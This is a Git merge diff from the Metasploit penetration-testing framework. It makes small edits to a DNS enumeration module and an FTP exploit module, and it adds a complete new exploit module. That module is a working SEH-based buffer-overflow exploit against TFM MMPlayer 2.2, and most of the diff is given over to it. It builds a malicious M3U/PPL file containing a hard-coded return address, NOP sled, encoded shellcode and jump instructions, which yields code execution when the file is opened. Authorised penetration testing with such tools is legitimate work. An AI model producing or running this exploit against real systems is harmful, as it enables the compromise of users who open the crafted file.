Merge branch 'master' into feature/vuln-info

modules/auxiliary/gather/enum_dns.rb

@@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
 			[
 				OptString.new('DOMAIN', [ true, "The target domain name"]),
 				OptBool.new('ENUM_AXFR', [ true, 'Initiate a zone transfer against each NS record', true]),
-				OptBool.new('ENUM_TLD', [ true, 'Perform a top-level domain expansion by replacing the TLD and testing against IANA TLD list', false]),
+				OptBool.new('ENUM_TLD', [ true, 'Perform a TLD expansion by replacing the TLD with the IANA TLD list', false]),
 				OptBool.new('ENUM_STD', [ true, 'Enumerate standard record types (A,MX,NS,TXT and SOA)', true]),
 				OptBool.new('ENUM_BRT', [ true, 'Brute force subdomains and hostnames via the supplied wordlist', false]),
 				OptBool.new('ENUM_IP6', [ true, 'Brute force hosts with IPv6 AAAA records',false]),

modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb

@@ -0,0 +1,94 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GoodRanking
+
+	include Msf::Exploit::FILEFORMAT
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'TFM MMPlayer (m3u/ppl File) Buffer Overflow',
+			'Description'    => %q{
+				This module exploits a buffer overflow in MMPlayer 2.2
+				The vulnerability is triggered when opening a malformed M3U/PPL file
+				that contains an overly long string, which results in overwriting a
+				SEH record, thus allowing arbitrary code execution under the context
+				of the user.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'RjRjh Hack3r',                        # Original discovery and exploit
+					'Brendan Coles <bcoles[at]gmail.com>'  # msf exploit
+				],
+			'References'     =>
+				[
+					[ 'OSVDB', '80532' ],
+					[ 'BID', '52698' ],
+					[ 'EDB', '18656' ], # .m3u
+					[ 'EDB', '18657' ]  # .ppl
+				],
+			'DefaultOptions' =>
+				{
+					'ExitFunction' => 'seh',
+					'InitialAutoRunScript' => 'migrate -f'
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					# Tested on:
+					# Windows XP Pro SP3 - English
+					# Windows Vista SP1 - English
+					# Windows 7 Home Basic SP0 - English
+					# Windows 7 Ultimate SP1 - English
+					# Windows Server 2003 Enterprise SP2 - English
+					[ 'Windows Universal', { 'Ret' => 0x00401390 } ], # p/p/r -> MMPlayer.exe
+				],
+			'Payload'        =>
+				{
+					'Size' => 4000,
+					'BadChars' => "\x00\x0a\x0d",
+					'DisableNops' => false
+				},
+			'Privileged'     => false,
+			'DisclosureDate' => 'Mar 23 2012',
+			'DefaultTarget'  => 0
+		))
+
+		register_options(
+			[
+				OptString.new('FILENAME', [ true, 'The file name.', 'msf.ppl'])
+			], self.class)
+
+	end
+
+	def exploit
+
+		nops   = make_nops(10)
+		sc     = payload.encoded
+		offset = Rex::Text.rand_text_alphanumeric(4103 - sc.length - nops.length)
+		jmp    = Rex::Arch::X86.jmp(-4108)            # near jump 4103 bytes
+		nseh   = Rex::Arch::X86.jmp_short(-7)         # jmp back 7 bytes
+		nseh  << Rex::Text.rand_text_alphanumeric(2)
+		seh    = [target.ret].pack('V')
+
+		sploit  = nops
+		sploit << sc
+		sploit << offset
+		sploit << jmp
+		sploit << nseh
+		sploit << seh
+
+		# write file
+		file_create(sploit)
+
+	end
+end
+

modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb

@@ -42,6 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'References'    =>
 				[
 					# When a DoS is NOT a DoS
+					[ 'OSVDB', '82798'],
 					[ 'EDB', '19024']
 				],
 			'DefaultOptions' =>